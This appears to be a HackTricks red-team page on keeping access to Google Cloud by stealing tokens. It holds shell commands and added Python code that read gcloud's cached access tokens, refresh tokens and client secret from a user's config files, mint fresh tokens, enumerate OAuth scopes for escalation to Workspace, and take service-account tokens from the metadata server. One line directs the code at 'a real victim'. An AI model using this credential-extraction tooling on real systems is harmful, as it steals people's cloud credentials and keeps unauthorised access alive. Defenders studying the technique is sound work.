GCP - Token Persistence


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Authenticated User Tokens

To get the current cached access token of a user you can run:

```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```

Check in this page how to use this token directly with gcloud:

Cloud SSRF - HackTricks

To get the details needed to generate a new access token (refresh token, client ID and client secret) run:

```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```

It is also possible to find refresh tokens in $HOME/.config/gcloud/application_default_credentials.json and in $HOME/.config/gcloud/legacy_credentials/*/adc.json.

To get a new, refreshed access token using the refresh token, client ID and client secret run:

```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```

The validity of refresh tokens can be controlled in Admin > Security > Google Cloud session control; by default the reauthentication frequency is 16 hours, although it can also be configured so that sessions never expire.
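The same extraction as the sqlite3 and curl commands above, as an added Python example (not code from the original page or from gcloud): it reads the cached access token and checks whether it has expired, pulls the refresh material out of credentials.db, collects refresh tokens from the ADC and legacy JSON files, and builds the refresh request. The table layouts reproduced in make_sample_store and the naive-UTC format of token_expiry are assumptions about current gcloud releases; the sample store the block builds contains placeholder tokens, not real credentials, and only refresh_access_token touches the network.

```python
"""Extract cached gcloud credentials from the SQLite stores and build the refresh request."""
import glob
import json
import os
import sqlite3
import tempfile
import urllib.request
from datetime import datetime, timezone
from urllib.parse import urlencode

TOKEN_URL = "https://www.googleapis.com/oauth2/v4/token"  # endpoint used by the curl command above
DEFAULT_SCOPES = ("https://www.googleapis.com/auth/cloud-platform "
                  "https://www.googleapis.com/auth/accounts.reauth")


def cached_access_token(cfg_dir, email):
    """Read the cached access token for `email` from access_tokens.db and say if it is unexpired.
    Assumption: token_expiry is stored as a naive UTC timestamp string."""
    db = os.path.join(cfg_dir, "access_tokens.db")
    if not os.path.isfile(db):
        return None
    con = sqlite3.connect(db)
    row = con.execute("select access_token, token_expiry from access_tokens where account_id=?",
                      (email,)).fetchone()
    con.close()
    if row is None:
        return None
    expiry = datetime.fromisoformat(row[1]).replace(tzinfo=timezone.utc)
    return {"access_token": row[0], "expiry": expiry, "valid": expiry > datetime.now(timezone.utc)}


def refresh_material(cfg_dir, email):
    """Read client_id / client_secret / refresh_token for `email` from credentials.db.
    The `value` column holds a JSON document (stored as text or bytes)."""
    db = os.path.join(cfg_dir, "credentials.db")
    if not os.path.isfile(db):
        return None
    con = sqlite3.connect(db)
    row = con.execute("select value from credentials where account_id=?", (email,)).fetchone()
    con.close()
    if row is None:
        return None
    raw = row[0].decode() if isinstance(row[0], bytes) else row[0]
    doc = json.loads(raw)
    return {k: doc.get(k) for k in ("type", "client_id", "client_secret", "refresh_token")}


def refresh_tokens_on_disk(cfg_dir):
    """Collect refresh tokens from the ADC file and legacy_credentials/*/adc.json."""
    paths = [os.path.join(cfg_dir, "application_default_credentials.json")]
    paths += glob.glob(os.path.join(cfg_dir, "legacy_credentials", "*", "adc.json"))
    found = {}
    for p in paths:
        if os.path.isfile(p):
            with open(p) as f:
                doc = json.load(f)
            if doc.get("refresh_token"):
                found[p] = doc["refresh_token"]
    return found


def build_refresh_request(material, scopes=DEFAULT_SCOPES):
    """Return (url, form-encoded body), the same request as the curl refresh command above."""
    body = {"client_id": material["client_id"], "client_secret": material["client_secret"],
            "grant_type": "refresh_token", "refresh_token": material["refresh_token"],
            "scope": scopes}
    return TOKEN_URL, urlencode(body)


def refresh_access_token(material, scopes=DEFAULT_SCOPES):
    """Perform the refresh for real (needs network); returns Google's JSON response."""
    url, body = build_refresh_request(material, scopes)
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def make_sample_store(cfg_dir, email):
    """Constructed sample store with the table layout gcloud uses (assumption); placeholder tokens."""
    con = sqlite3.connect(os.path.join(cfg_dir, "access_tokens.db"))
    con.execute("create table access_tokens (account_id text primary key, access_token text, "
                "token_expiry timestamp, rapt_token text, id_token text)")
    con.execute("insert into access_tokens values (?,?,?,?,?)",
                (email, "ya29.constructed-sample-token", "2000-01-01 00:00:00", None, None))
    con.commit()
    con.close()
    con = sqlite3.connect(os.path.join(cfg_dir, "credentials.db"))
    con.execute("create table credentials (account_id text primary key, value blob)")
    con.execute("insert into credentials values (?,?)", (email, json.dumps({
        "type": "authorized_user", "client_id": "32555940559.apps.googleusercontent.com",
        "client_secret": "ZmssLNjJy2998hD4CTg2ejr2",
        "refresh_token": "1//constructed-refresh-token", "token_uri": TOKEN_URL})))
    con.commit()
    con.close()
    with open(os.path.join(cfg_dir, "application_default_credentials.json"), "w") as f:
        json.dump({"type": "authorized_user", "refresh_token": "1//constructed-adc-token"}, f)


def demo(email="victim@example.com"):
    """Build the sample store in a temp dir and run every extraction step against it."""
    d = tempfile.mkdtemp()
    make_sample_store(d, email)
    material = refresh_material(d, email)
    return {"cached": cached_access_token(d, email), "material": material,
            "request": build_refresh_request(material), "on_disk": refresh_tokens_on_disk(d)}


if __name__ == "__main__":
    print(json.dumps(demo(), default=str, indent=2))
```

Against a real victim, point the functions at $HOME/.config/gcloud instead of the sample store and pass the result of refresh_material to refresh_access_token; the cached token is only worth using while "valid" is true.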

Auth flow

The authentication flow used by something like gcloud auth login opens a window in the browser and, after all the scopes have been accepted, the browser sends a request like the following to the HTTP port that the tool opened on localhost:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Then gcloud uses the state and the code, together with the client_id (32555940559.apps.googleusercontent.com) and the client_secret (ZmssLNjJy2998hD4CTg2ejr2), to obtain the final refresh token data.

caution

Note that the communication with localhost is over plain HTTP, so the authorization code could be intercepted there in order to obtain the refresh token; however, the code is valid only once (and, since the authorization request sends a PKCE code_challenge, the exchange also needs the code_verifier held only by the gcloud process), so this is pointless: it is easier to just read the refresh token from the file.
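An added example (not code from the original page or from gcloud) that reproduces the localhost leg of this flow: it opens a loopback listener the way gcloud does, replays the captured redirect from above against it, parses state, code and scopes, and builds the code-for-token exchange the CLI performs next. The token endpoint URL and the field names of that exchange are the standard OAuth 2.0 / PKCE ones and are assumptions about gcloud's internals; what the block shows is that the exchange also needs the code_verifier, which never appears on the localhost redirect.

```python
"""Capture the localhost redirect of the gcloud auth flow and build the follow-up exchange."""
import base64
import hashlib
import secrets
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

GCLOUD_CLIENT_ID = "32555940559.apps.googleusercontent.com"  # from the page
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"         # assumption: standard Google endpoint

# The redirect captured on the page, replayed against our own listener (constructed test input).
SAMPLE_REDIRECT_PATH = (
    "/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO"
    "&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A"
    "&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20"
    "https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20"
    "https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20"
    "https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent")


def parse_redirect(path):
    """Pull state, authorization code and granted scopes out of the redirect request line."""
    q = parse_qs(urlparse(path).query)
    return {"state": q["state"][0], "code": q["code"][0], "scopes": q["scope"][0].split()}


def new_pkce_verifier():
    """Random code_verifier as the CLI generates before opening the browser."""
    return base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()


def pkce_challenge(verifier):
    """S256 code_challenge, the method shown in the page's authorization URL."""
    digest = hashlib.sha256(verifier.encode()).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()


def build_code_exchange(code, redirect_uri, client_secret, code_verifier, client_id=GCLOUD_CLIENT_ID):
    """Form body of the code-for-token exchange (assumption: standard RFC 6749 + RFC 7636 fields).
    code_verifier only leaves the CLI in this request, so a passive observer of the localhost
    redirect holds the single-use code but cannot complete the exchange."""
    return {"code": code, "client_id": client_id, "client_secret": client_secret,
            "redirect_uri": redirect_uri, "grant_type": "authorization_code",
            "code_verifier": code_verifier}


class _RedirectCatcher(BaseHTTPRequestHandler):
    captured = []

    def do_GET(self):
        _RedirectCatcher.captured.append(self.path)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"captured")

    def log_message(self, *args):  # keep the demo quiet
        pass


def capture_redirect(path=SAMPLE_REDIRECT_PATH):
    """Listen on a random loopback port like gcloud does, replay the sample redirect to it
    and return the parsed parameters."""
    srv = HTTPServer(("127.0.0.1", 0), _RedirectCatcher)
    port = srv.server_address[1]
    t = threading.Thread(target=srv.handle_request)
    t.start()
    urllib.request.urlopen(f"http://127.0.0.1:{port}{path}", timeout=5).read()
    t.join()
    srv.server_close()
    return parse_redirect(_RedirectCatcher.captured[-1])


if __name__ == "__main__":
    got = capture_redirect()
    verifier = new_pkce_verifier()
    print(got)
    print("challenge:", pkce_challenge(verifier))
    print(build_code_exchange(got["code"], "http://localhost:8085/", "<client_secret>", verifier))
```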

OAuth Scopes

You can find all the Google scopes in https://developers.google.com/identity/protocols/oauth2/scopes or obtain them by running:

```bash
curl -s "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u
```

It is possible to check which of those scopes the OAuth application gcloud authenticates with (client_id 32555940559.apps.googleusercontent.com) is allowed to request with this script. Google answers the authorization request with an error page when the client is not permitted a scope, so the scopes whose response contains no "error" are printed as supported:

```bash
# For every documented scope, request authorization for it with gcloud's client_id (plus the
# scopes gcloud normally asks for) and print the scope if Google did not reply with an error.
curl -s "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
  echo -ne "Testing $scope         \r"
  if ! curl -s -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
    echo ""
    echo "$scope"
  fi
done
```

After running it, it was verified that this application supports the following scopes:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

It is interesting to see that this application supports the drive scope, which could allow an attacker to escalate from GCP to Workspace if they manage to make the user generate a token with this scope.

Check how to abuse this here.

Service Accounts

As with authenticated users, if you manage to compromise the private key file of a service account you will usually be able to access it for as long as you want.
However, stealing an OAuth token of a service account can be even more interesting because, even though these tokens are normally valid for only one hour, if the victim deletes the private API key the OAuth token remains valid until it expires.

Metadata

Obviously, as long as you are inside a machine running in the GCP environment you will be able to access the service account attached to that machine by contacting the metadata endpoint (note that the OAuth tokens you can obtain from this endpoint are usually restricted by scopes).
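Added example, not code from the original page: querying the metadata endpoint for the attached service account's email, scopes and access token with the mandatory Metadata-Flavor header, and flagging whether the cloud-platform scope is among the granted ones. The fake metadata server in the block is a constructed stand-in so the code runs offline; its email, scopes and token values are placeholders, and on a real GCE VM you would pass METADATA_BASE instead.

```python
"""Fetch the attached service account's token and scopes from the GCE metadata server."""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

METADATA_BASE = "http://metadata.google.internal/computeMetadata/v1"
SA = "/instance/service-accounts/default"
FULL_ACCESS = "https://www.googleapis.com/auth/cloud-platform"


def metadata_get(path, base=METADATA_BASE):
    """GET a metadata path; without the Metadata-Flavor header the server answers 403."""
    req = urllib.request.Request(base + path, headers={"Metadata-Flavor": "Google"})
    with urllib.request.urlopen(req, timeout=3) as resp:
        return resp.read().decode()


def attached_service_account(base=METADATA_BASE):
    """Return the attached SA's email, its granted scopes and a fresh access token."""
    email = metadata_get(SA + "/email", base).strip()
    scopes = metadata_get(SA + "/scopes", base).split()
    tok = json.loads(metadata_get(SA + "/token", base))
    return {"email": email, "scopes": scopes, "access_token": tok["access_token"],
            "expires_in": tok["expires_in"], "full_cloud_platform": FULL_ACCESS in scopes}


# Constructed fake metadata server so the example runs offline; all values are placeholders.
class _FakeMetadata(BaseHTTPRequestHandler):
    routes = {
        "/computeMetadata/v1" + SA + "/email": "constructed-sa@example-project.iam.gserviceaccount.com",
        "/computeMetadata/v1" + SA + "/scopes": ("https://www.googleapis.com/auth/devstorage.read_only\n"
                                                "https://www.googleapis.com/auth/logging.write\n"),
        "/computeMetadata/v1" + SA + "/token": json.dumps({"access_token": "ya29.constructed-metadata-token",
                                                          "expires_in": 3599, "token_type": "Bearer"}),
    }

    def do_GET(self):
        if self.headers.get("Metadata-Flavor") != "Google":  # mirror the real endpoint's check
            self.send_response(403)
            self.end_headers()
            return
        body = self.routes.get(self.path)
        self.send_response(200 if body is not None else 404)
        self.end_headers()
        self.wfile.write((body or "").encode())

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_metadata():
    """Start the fake server on a random loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeMetadata)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/computeMetadata/v1"


if __name__ == "__main__":
    srv, base = start_fake_metadata()  # use METADATA_BASE on a real GCE VM
    print(json.dumps(attached_service_account(base), indent=2))
    srv.shutdown()
```

The full_cloud_platform flag is the first thing worth checking: a token limited to scopes such as devstorage.read_only cannot be used against arbitrary APIs even though the service account's IAM roles might allow it.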

Remediations

Several remediations for these techniques are explained in https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2

